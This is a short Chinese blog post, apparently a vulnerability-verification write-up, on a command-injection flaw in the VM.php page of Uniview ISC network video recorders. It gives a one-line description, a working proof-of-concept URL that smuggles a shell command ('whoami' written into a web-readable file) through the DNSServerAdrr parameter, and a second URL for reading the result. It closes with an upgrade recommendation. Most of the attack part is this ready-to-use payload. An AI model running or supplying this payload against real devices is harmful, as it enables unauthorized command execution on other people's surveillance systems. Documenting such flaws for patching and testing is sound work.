漏洞验证-宇视科技网络录像机ISC VM.php命令执行

一、漏洞描述

宇视科技网络录像机ISC是一款高性能的网络视频录像机，支持多种协议，包括ONVIF、RTSP等。宇视科技网络录像机ISC VM.php页面存在命令执行漏洞，攻击者利用该漏洞可以执行任意系统命令。

二、POC

http://XXXX/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.txt %23"

http://XXXX//Interface/DevManage/11.txt

三、验证截图

四、修复建议

建议升级系统至官方发布的最新版本

posted @ 2025-04-07 10:32 Domren 阅读(165) 评论(0) 收藏举报

刷新页面返回顶部